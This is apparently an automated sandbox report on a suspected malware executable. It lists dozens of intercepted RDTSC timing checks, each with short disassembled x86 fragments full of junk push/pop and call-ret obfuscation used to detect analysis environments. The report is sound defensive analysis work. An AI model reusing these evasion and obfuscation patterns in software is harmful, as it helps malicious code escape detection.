Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 106C846 second address: 106C853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jg 00007F618483489Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 106C853 second address: 106C857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 106CB2B second address: 106CB6A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6184834896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F618483489Ah 0x00000012 pop edx 0x00000013 popad 0x00000014 pushad 0x00000015 jns 00007F61848348B1h 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1071B6B second address: 1071B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1076CBD second address: 1076CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1076CC6 second address: 1076CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6184CCBA83h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jnp 00007F6184CCBA76h 0x00000011 jno 00007F6184CCBA76h 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1077418 second address: 1077434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F61848348A8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1077434 second address: 1077452 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6184CCBA76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jns 00007F6184CCBA76h 0x00000015 pop ecx 0x00000016 jc 00007F6184CCBA87h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1077452 second address: 1077468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F618483489Bh 0x00000009 popad 0x0000000a push ecx 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1062BC6 second address: 1062BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6184CCBA81h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1078D54 second address: 1078D5E instructions: 0x00000000 rdtsc 0x00000002 je 00007F6184834896h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1078D5E second address: 1078D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1078D6B second address: 1078D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1078D71 second address: 1078D80 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jne 00007F6184CCBA76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10435FD second address: 1043679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6184834896h 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F6184834898h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 stc 0x00000027 call 00007F61848348A8h 0x0000002c mov ch, 8Dh 0x0000002e pop edx 0x0000002f lea eax, dword ptr [ebp+12479357h] 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007F6184834898h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f mov edi, dword ptr [ebp+122D2A82h] 0x00000055 push eax 0x00000056 push ebx 0x00000057 push eax 0x00000058 push edx 0x00000059 jne 00007F6184834896h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1043679 second address: 102BAF8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F6184CCBA78h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push edi 0x00000025 pushad 0x00000026 movsx edi, si 0x00000029 js 00007F6184CCBA76h 0x0000002f popad 0x00000030 pop edi 0x00000031 or edx, 7237A705h 0x00000037 call dword ptr [ebp+122D32C0h] 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 js 00007F6184CCBA76h 0x00000047 push edi 0x00000048 pop edi 0x00000049 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10437F5 second address: 10437FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1043BAF second address: 1043BF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 55A6BFCEh 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F6184CCBA78h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a push 93D0AEFBh 0x0000002f jng 00007F6184CCBA8Ah 0x00000035 push eax 0x00000036 push edx 0x00000037 push ecx 0x00000038 pop ecx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1043CFE second address: 1043D3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, esi 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F6184834898h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 add edx, dword ptr [ebp+122D2B22h] 0x00000027 and ecx, 1EF1A52Dh 0x0000002d nop 0x0000002e push edx 0x0000002f jbe 00007F618483489Ch 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1043D3C second address: 1043D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jng 00007F6184CCBA96h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6184CCBA88h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 104441E second address: 104443A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F61848348A8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 104443A second address: 1044469 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, dword ptr [ebp+122D226Dh] 0x0000000f push 0000001Eh 0x00000011 mov dword ptr [ebp+122D32B9h], esi 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b jmp 00007F6184CCBA83h 0x00000020 pop esi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1044469 second address: 104446E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1044572 second address: 1044576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 104480A second address: 1044856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edx, dword ptr [ebp+122D2B32h] 0x0000000e or edx, 337EC500h 0x00000014 lea eax, dword ptr [ebp+12479357h] 0x0000001a ja 00007F61848348BCh 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 push ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1044856 second address: 104485B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 104485B second address: 104486C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 104486C second address: 1044872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1044872 second address: 102C5CB instructions: 0x00000000 rdtsc 0x00000002 js 00007F6184834896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov ch, 3Fh 0x0000000f call dword ptr [ebp+122D3298h] 0x00000015 pushad 0x00000016 jnc 00007F618483489Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e jg 00007F6184834896h 0x00000024 push edi 0x00000025 pop edi 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 102C5CB second address: 102C5CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 102C5CF second address: 102C61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6184834896h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F61848348BCh 0x00000012 jmp 00007F61848348A0h 0x00000017 jmp 00007F61848348A6h 0x0000001c jmp 00007F618483489Dh 0x00000021 popad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push esi 0x00000026 pop esi 0x00000027 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 102C61A second address: 102C642 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6184CCBA80h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F6184CCBA7Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 102C642 second address: 102C654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F6184834898h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1000EA7 second address: 1000EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6184CCBA76h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107C3CC second address: 107C3D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107C3D4 second address: 107C3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107C7C2 second address: 107C7C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107C7C8 second address: 107C7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107C935 second address: 107C939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107C939 second address: 107C93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107C93F second address: 107C954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F618483489Fh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CA8D second address: 107CAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6184CCBA86h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CAA7 second address: 107CAAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CAAD second address: 107CAB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CAB3 second address: 107CAB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CAB7 second address: 107CAC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CAC4 second address: 107CACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CACA second address: 107CACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CACE second address: 107CADC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6184834896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1000ECA second address: 1000ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CDA5 second address: 107CDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6184834896h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CDB9 second address: 107CDDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Fh 0x00000007 jo 00007F6184CCBA76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 jg 00007F6184CCBA76h 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CDDC second address: 107CDFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F61848348A8h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 107CDFA second address: 107CE04 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6184CCBA76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10F087F second address: 10F0889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F6184834896h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EF3F8 second address: 10EF411 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a jbe 00007F6184CCBA7Ch 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EF411 second address: 10EF417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EF69A second address: 10EF6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6184CCBA76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EF7FB second address: 10EF7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EF7FF second address: 10EF812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EF812 second address: 10EF817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EFAD4 second address: 10EFAD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EFAD8 second address: 10EFAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EFC23 second address: 10EFC27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EFC27 second address: 10EFC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F618483489Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10F36A7 second address: 10F36E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6184CCBA83h 0x00000009 pop edx 0x0000000a jnl 00007F6184CCBA8Fh 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F6184CCBA76h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10F36E8 second address: 10F36EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10F3244 second address: 10F3248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10F3248 second address: 10F325C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007F6184834896h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10F33BE second address: 10F33C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10F33C4 second address: 10F33D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6184834896h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1144E96 second address: 1144E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1144E9A second address: 1144E9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1144E9E second address: 1144EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1144EA4 second address: 1144EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1209E98 second address: 1209EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6184CCBA76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 1209FF3 second address: 1209FFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F6184834896h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120A5D0 second address: 120A5D9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120A5D9 second address: 120A5DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120A5DF second address: 120A5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jc 00007F6184CCBA76h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120A763 second address: 120A787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F6184834896h 0x00000010 jmp 00007F61848348A3h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120A787 second address: 120A798 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Ah 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120A798 second address: 120A7A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6184834896h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 120C615 second address: 120C61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
